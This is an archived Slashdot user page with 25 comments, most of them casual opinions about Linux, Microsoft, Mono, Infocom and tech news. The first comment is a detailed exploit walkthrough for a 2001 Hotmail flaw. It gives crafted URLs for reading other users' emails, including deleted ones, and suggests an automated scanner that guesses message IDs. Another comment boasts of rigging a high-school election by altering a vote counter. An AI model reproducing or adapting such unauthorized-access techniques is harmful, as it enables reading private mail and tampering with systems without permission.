Slashdot Mirror


User: gol64738

gol64738's activity in the archive.

Stories
0
Comments
289
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 289

  1. here's the instructions how to do it on Hotmail Hacked · · Score: 1, Informative

    ---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---

    (Tested with Internet Explorer 5)

    To view full email from some elses account do the following:

    1. Login normally to Hotmail with your ID (any id)

    2. Use this type of link to view specific message from specific user:

    http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0% 26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
    or
    http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2 fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d 0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com

    From that link change values:
    MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped code for ".")
    username (Hotmail account name to view)

    MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149

    (remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
    (remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)

    Note.You need to have both numbers correct
    and that username must have the message to make this link work.

    Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them instead of true characters.
    See here for full list: http://www.december.com/html/spec/ascii.html

    3. Done. If you entered correct message number & that user has it you will see it. :)
    (Test it with your own other hotmail account messages first to get the idea working.)

    ---=[ ideas and comments for improved viewing / scan ]=---

    Now typing those message numbers manually is too much
    work, you could create a small utility to automatically
    scan given range of messages from specific user name.
    (You need to build it to work with IE, as you must be
    logged in hotmail when you want to view messages..)

    It also helps to know that from the message numbers,
    in you own hotmail inbox,you can see about what time
    is what message number been used. eg:

    MSG998289581.0 arrived on 20.08.2001
    MSG997936971.27 arrived on 16.08.2001.
    MSG996698372.27 arrived on 01.08.2001.
    MSG975960863.0 arrived on 04.12.2000.

    So you dont need to scan as many message addresses
    when you know from which range you are looking at.

    Test messages: (Login to hotmail,then use links to view message from my test account)

    raw format view: (can copy base64 encoded files too:)
    http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d 64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om

    email box view: (can see any attached images directly etc.:)
    http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3 6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com

    *Side note on deleting messages in Hotmail:
    -You can also see the message even if its deleted!
    If you delete a message in hotmail, and
    also empty trashcan, the message is still
    viewable using this type of link.
    Atleast for 6-12hrs or something.

    ---=[.... Status / Feedback / Fixes / Questions .....]---

    Changes on the link:

    Remove parameter:
    %26disk%3d64%2e4%2e36%2e68_d1577
    It caused Hotmail error page in some cases:
    "Due to an internal error your request cannot be processed.
    We apologize for the inconvenience. Please try again later."
    Solution:
    Remove that parameter from the link. its not required.

    Changed parameters:
    %26start%3d9702%26len%3d9687
    in to:
    %26start%3d1%26len%3d9999999999999999

    Thats is just the start & length to display, of the email.
    If you put too small value for len it should display
    only up to that amount of characters(?).

    *
    If the user doesnt have the message you will get error:
    "
    Subject: Unable to locate message
    Content-Type: text/plain; charset=us-ascii
    An error has prevented from locating the message."

    *
    Questions:
    Q1. How do i get to know which message number the user has?

    A1. You cannot. You just have to guess them..one by one.
    Yes, it could mean scanning thousands/millions of
    messages just to see something. (slow it is)

    Q2. I've sended a test message to my another account but cannot see it?
    And i can still see your test messages, but not my own?

    A2. Check again that your MSG number is correct, both X and Y. (MSGXXXXXXXXX.YYY)
    The Y value can be between 0-nnn. (i havent seen bigger than 150)
    Check that the link is correct.
    Check that you are logged in to Hotmail.
    Also try change the server, from "pv2fd.pav2.hotmail" to "lw14fd.law14.hotmail"
    If you can see the test account messages then hotmail hasnt been fixed yet.

    Q3. The hobo scanner program doesnt work?
    I get some "Path not found (76)" error?

    A3. True in most cases.. :)
    It has more bugs than microsoft products i guess.
    Its confirmed that it works atleast on win95. (latest version is hobo rev.2)
    On Winnt it works but it doesnt save the scans..(bug in activating the webwindow..)
    Create the output directory yourself, that fixes the path error.

    Q4. Where/How can i find this exploit link myself?

    A4. 1. Go to your hotmail preferences page.
    2. Go to Mail Display Settings.
    3. Set option 'Message Headers' to 'Advanced'.
    4. Press ok to save settings.
    5. View some email, you will see full message header.
    6. Click 'View E-mail Message Source'.
    7. Done. It opens new window with this exploitable link,
    you can remove the some useless parameters from the
    link and send this link to a friend for testing
    if can see your message.

    *
    No any reply or confirmation from Hotmail so far.
    The exploit still works. already almost 3 days since
    reported it to Hotmail..(today is 20.08.2001)

    Automated reply from hotmail security problem
    submission page did gave this type of message..:p

    "...Hotmail is a secure site and uses an intrusion alert that allows only one IP
    address to gain access to a mailbox at a time. If anyone tries to access your
    e-mail when your account is open, he or she is returned to the sign-in page.
    Hotmail uses state-of-the-art software and firewall protection to offer our
    members the highest security...."

  2. i thought IBM was bad.. on IBM Wants Linux · · Score: 1

    oh yeah, IBM was the bad guy ten years ago, and Microsoft was good. Does that mean that in ten years, IBM will be the bad guy and Microsoft will be good?

    what the hell is going on here??

  3. the best line in the story is... on Israeli AI System "Hal" And The Turing Test · · Score: 1

    From the story: Science fiction aficionados are aware of the potential downside to Hal, whose namesake in Stanley Kubrick's "2001: A Space Odyssey" killed off most of its crew during a space mission.

    potential downside, ya i would say that's "down". let's raise a killer! haha!

  4. Re:You can't run IE plugins in NETSCAPE either on New IE Disables Netscape-style Plug-ins · · Score: 1

    But alas, I forgot I'm talking to open source people who wouldn't pay for software because they can hudle together and make a free version of it, but by then, the product is so out dated that its' useless.

    just how clueless are you? for one, open source and free software have absolutely nothing to do with each other.
    also, 'dated' software is more typical of closed projects from a single company. why? because only their programmers can change it to make it better or more adapatable. with open projects, anyone in the world can make changes for adaptability.

    if i had to guess, i would say that you're about 15 years old with lots of windows experience who thinks he knows everything about computers. don't worry though, knowledge comes with age.

  5. this seems to work on Florida County Asks Students To Crack Elections · · Score: 1

    when i was a senior in high scholl (1988), we voted for our class president on apple ][s. i really wanted this one guy to win. it was easy:
    1. stop the voting program
    2. $votevalue=$votevalue+250
    3. continue the program

    needless to say, he won by a landslide. the school was upset because this guy was a nobody, but won class president.
    i let him know after he won (and reminded him at our 10 year reunion). whew, those were the days...

  6. c'mon people, don't overlook the obvious! on On The Costs of Full Security Disclosure · · Score: 1

    sure, there's worms that affect both *NIX and Microsoft OS's. HOWEVER, Windows is closed source and only ONE company controls it. therefore, when a new security problem is discovered, it could take weeks before a solution is implemented.

    on the other hand, on the *NIX side, if a security problem is found, you get every 14 year old geek from california to siberia working on the problem within hours of the discovery.
    Using the internet, the solutions provided by *NIX hackers are immediately available.

    the microsoft way of giving solutions to their own security problems are ass-backward.

  7. the real difference on Don't Forget That Worms Happen Everywhere · · Score: 1

    *NIX worms do exist, however, once it strikes, the world benfits from the world working on the problem, not a single company.

    the world will not hide a new worm from itself, however, a single company (microsoft) can (and will, as history shows).

  8. Re:Doesn't that defeat the purpose of having a boo on This Book Will Self-Destruct In 10 Hours · · Score: 1

    but I must say...there is something satisfying about paper. About holding a book in your hands. About owning a book.

    damn right, and what about the smell? am i the only one who stops reading every half hour or so and takes a deep whiff of the binding? mmmmmmm..

  9. where is this going? on This Book Will Self-Destruct In 10 Hours · · Score: 1

    i'm getting so sick and tired of our fair use rights going in the toilet every five minutes!
    the only other time-release program for books i know of is the local library, and that doesn't cost money and the measurement is days, not hours.
    i don't understand how i can continue being a technologist when, with each passing day and after reading stupid news stories like this one, i want to move into the British Columbia wilderness and shoot my own food to survive....

  10. hmmmm... on 3COM's Ergo Audrey Hacked · · Score: 2, Insightful

    what's with the dec '99 dates for /bin and /tmp? he says that he purchased it on july 23rd. i think his directory creation dates look a little funny. maybe these *are* faked.

  11. Re:Toshiba Satellite 1755 on Which Laptop To Buy? · · Score: 1

    The OSS drivers work perfectly, but I refuse to drop them cash ($45!)

    yikes! when i found that the OSS drivers made my Sony PCG-N505VE superslim work perfectly, i didn't even hesitate! goodbye $45! $45 isn't much to turn your superslim laptop into a great car mp3 player, however, don't leave it in the car. my lovable laptop was stolen right out of the car, dammit! now i'm laptopless.

  12. what game is the US playing? on Sklyarov Released On $50,000 Bail · · Score: 2, Interesting

    damn, after reading the news about the american student who was held unfairly in russia and then released yesterday, i couldn't help but think there was a private exchange behind the scenes regarding our american prisoner and Dimitry. i think Dmitry was being made an example of as a way for the US to get back at Russia for unfairly holding our american student on bullshit (planted) drug charges.
    after reading the full story regarding our jailed american student, i couldn't help but laugh as i read all the 'Free Dmitry' sites! i mean, maybe the US doesn't feel so strongly about the speech and freedom issues like we think they do. perhaps they were just playing a bit of hard ball with the russians to get our american student released...
    just my thoughts...

  13. Re:I use Win2k now but I'll be upgrading to XP on A Visual Comparison Between XP And Mandrake · · Score: 1

    the post was actually put there to be funny, not serious. i can understand the importance of boot time if you don't leave your system on 24/7.
    my question to you is: if you've used linux since 93, then why (other than for gaming) do you use windows at all??
    i'm a python, C and web developer and find no need to have a dedicated windows machine. if i need a word doc or excel or dreamweaver, i simply use win4lin and run windows inside my linux desktop.

  14. Re:I use Win2k now but I'll be upgrading to XP on A Visual Comparison Between XP And Mandrake · · Score: 1

    i love reading windows users' comments about how important boot time is! i wouldn't care if my linux box took 5 minutes to boot, so what? so i waste 5 minutes every couple of months?

    i mean, the guy has rebooted his 2 systems so many times, he even knows that there are exactly 27 seconds difference between the two! to a linux user, his comments are unbelievable!

  15. Re:Hmm... on RedHat 7.2 Beta: Roswell · · Score: 1

    haha, at linuxworld last year, someone was handing out "ROB MALDA SUCKS" stickers. there was a large group of people wearing them.
    so, when i was partying it up with jeff bates later that night, he saw it and laughed his ass off! haha!

  16. what a stupid question. here's why: on Do We Spend More On Linux Or Windows? · · Score: 1

    so, if i were to go to a rock n roll forum and ask, "what do you spend more money on Rock CD's or Classical CD's?"

    what do you think the answer would be, duh!

  17. well.... on Dell Drops Linux on Desktops and Laptops · · Score: 1

    it's not like there was any linux people over at Dell anyways... at our company, all our developers use Dell Dimension 4100's with linux preinstalled. it's pretty neat how they come with microsoft mice, however.
    we just received another one a few weeks ago, that had redhat 7.0 preinstalled, yuck.
    and even though they come with nvidia 32mb gts video, they're not even using the nvidia released drivers, sheesh. (but our linux boxen sure make for some nice q3 action at work, hee hee.)
    everytime a new Dell came in, i reinstalled linux on the thing anyway, so this news doesn't bother me a bit.

  18. do i understand this properly? on DotGNU and Mono Continue · · Score: 2, Interesting

    isn't it true that no matter who provides the front end, the back end authentication will be done with microsofts passport? isn't this a bad idea? is everyone hoping that an open source version of passport will be available at some point? doesn't anyone else feel that if someone designs an open source passport app that microsoft will sue using the DMCA?

    i mean, things like the samba project cannot be done anymore, thanks to the DMCA.
    please, someone correct me!

  19. how much money is involved? on Miguel de Icaza & Nat Friedman On Mono · · Score: 1

    i've been trying to find out what kind of money is involved. i mean, is microsoft going to allocate funds to ximian in their help for ximians support of .NET? maybe there's a lot of money involved, so miguel is forced by his investors to take this route... is miguel is caught in the middle of his investors and his peers?

    ximian isn't exactly generating a lot of revenue and they've spent millions. how do we know that miguel is just trying to make the best of things to keep ximian going? for all we know, ximian investors might be giving ximian an ultimatum to acccept microsofts offer or die?

    btw, this is all pure speculation....

  20. dammit! on Petreley on Ximian and Mono · · Score: 1

    i don't want linux and the open source movement to have ANY ties with microsoft whatsoever. dammit miguel, why are you doing this? all you're going to do is tarnish the good Ximian name to us users.
    any wheelings and dealings with ximian and microsoft SCARES ME TO DEATH.

  21. why Michael Tiemann? on Open Source Convention 2001 Wrap-up · · Score: 1

    Michael appeared on stage like a know-it-all, almost making his position look bad because of his attitude!

    dammit, why didn't they get Bob Young in there? Bob has both the idealism of Michael Tiemann, but with the mannerisms of Craig Mundie. or, despite appearances, John Maddog Hall could've done a better job.
    where was larry augustine from VA linux? doen't VA own sourceforge? he would have been a perfect guest/speaker!
    sigh...

  22. good way to track it on What Makes You "High Risk" For SPAM? · · Score: 1

    anyone with their own mail server and domain should do what i do: everytime i sign up for something (e.g. yahoo), i make an address just for that company. so, i register with an email address of yahoo@mydomain.com. using this method, i can monitor who has sold me out and who hasn't.

    i haven't found any real blatant offenders, except for a couple of sweepstakes sites. it's good to know that if you do receive spam, you know who sold your address.

  23. infocom was advanced! on Infocom's Dave Lebling Interviewed · · Score: 1

    remember before infocom? there was a slew of adventures from Scott Adams. you remember, the ones you always saw advertised in Compute's classified section. input was limited to two words; an action and a target. when i saw an infocom game for the first time, it was like, 'holy shit! you can type sentences!"

  24. game packaging on Infocom's Dave Lebling Interviewed · · Score: 1

    wow, game packaging sure has changed from the eighties. remember what was contained in the Murder by the Dozen and PlanetFall boxes? there was so much extra materials in the game, it really made you feel like you were are part of it.
    look at today's materials.. sigh. sometimes just a bloody CD and nothing more..

  25. Re:OT: Summer Games on CD Copy "Protection" in California · · Score: 1

    hahaha, you DO remember Summer Games, hehe.